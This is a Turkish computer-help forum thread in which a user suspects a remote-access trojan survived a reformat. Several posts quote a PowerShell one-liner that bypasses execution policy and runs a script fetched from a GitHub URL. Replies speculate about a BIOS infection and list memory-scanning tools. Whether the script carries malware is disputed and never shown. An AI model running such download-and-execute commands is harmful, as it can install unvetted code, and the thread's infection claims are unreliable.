RAT yedim

Formattan sonra internete bağlamadan mikrofonumu kapatmıştım. İnternete bağlandığım gibi tekrar "Mikrofonunuz gizlilik ayarlarınız nedeniyle açılamadı." uyarısı aldım. Ve yüksek cpu kullanımı devam ediyor. Bu yüzden içim rahat değil hocam.
USB'yi hazırladığın pc virüslü pc ise oradan bilgisayara tekrar bulaşmış olabilir ( not = bu sadece bir teori olup olma ihtimali var mı bilemiyorum. ) Öyle değilse biosa virüs bulaşmış olabilir ama bu çok küçük bir ihtimal kolay birşeyde değil eğer sistemin eski bios sürümün eski ise belki olabilir.
 
USB'yi hazırladığın pc virüslü pc ise oradan bilgisayara tekrar bulaşmış olabilir ( not = bu sadece bir teori olup olma ihtimali var mı bilemiyorum. ) Öyle değilse biosa virüs bulaşmış olabilir ama bu çok küçük bir ihtimal kolay birşeyde değil eğer sistemin eski bios sürümün eski ise belki olabilir.
Hocam bu üst düzey RAT oluyor herhalde.
 
USB'yi hazırladığın pc virüslü pc ise oradan bilgisayara tekrar bulaşmış olabilir ( not = bu sadece bir teori olup olma ihtimali var mı bilemiyorum. ) Öyle değilse biosa virüs bulaşmış olabilir ama bu çok küçük bir ihtimal kolay birşeyde değil eğer sistemin eski bios sürümün eski ise belki olabilir.
Başka bir pcden hazırladım Usb'yi hocam, bios'um eski. Güncellemeyi düşündüm fakat bulamadım HP problemleri..
 
Ne kadar eski?


Şu virüs bulaştı dediğiniz şeyin linkini atar mısınız?
Atmam yanlış mı bilmiyorum ama. Kod;
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force; Start-BitsTransfer -Source "https://raw.githubusercontent.com/YurinDoctrine/Fresh-Script-Lite/main/Fresh-Lite/ooshutup.cfg"; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/YurinDoctrine/Fresh-Script-Lite/main/Fresh-Lite/Lite.ps1'))
 
Atmam yanlış mı bilmiyorum ama. Kod;
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force; Start-BitsTransfer -Source "https://raw.githubusercontent.com/YurinDoctrine/Fresh-Script-Lite/main/Fresh-Lite/ooshutup.cfg"; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/YurinDoctrine/Fresh-Script-Lite/main/Fresh-Lite/Lite.ps1'))
Bu RAT içeren kod olamaz ama RAT içeren kodu indiriyor.
 
Bu bilgiyi nerden aldığınıza dair kaynak bekliyorum, aksi takdirde de yorumunuzun hatalı olduğu şeklinde düzeltmenizi.
Yarı hatalı yarı doğru denilebilir. Çeşitli virüslerin bilgisayarda hiçbir dosyası bulunmayıp sadece bellekte çalışabiliyor. Tabii bunu tespit etmek çok da zor bir şey olmayacaktır.

-Farklı farklı tarama araçlarıyla bellek taramaları gerçekleştirmek, (ESET Online Scanner, F-Secure Online Scanner, Emsisoft Emergency Kit, Malwarebytes Free vb.)
-ESET SysInspector veya Kaspersky GSI ile sistem dökümü oluşturmak,
-Autoruns, ProcessExplorer gibi programlar aracılığıyla incelemeler yapmak.

Yüzde 100 olamayacak olsa da yüksek ihtimalle bu 3 şey ile bellekte çalışan virüsler tespit edilebilir.
 
Atmam yanlış mı bilmiyorum ama. Kod;
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force; Start-BitsTransfer -Source "https://raw.githubusercontent.com/YurinDoctrine/Fresh-Script-Lite/main/Fresh-Lite/ooshutup.cfg"; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/YurinDoctrine/Fresh-Script-Lite/main/Fresh-Lite/Lite.ps1'))
Hocam sitedeki kullanıcı bu = YurinDoctrine - Overview
Güvenilir hesabada benziyor ama bilemiyorum nasıl oldu bu.
 

Technopat Haberler

Yeni konular

Geri
Yukarı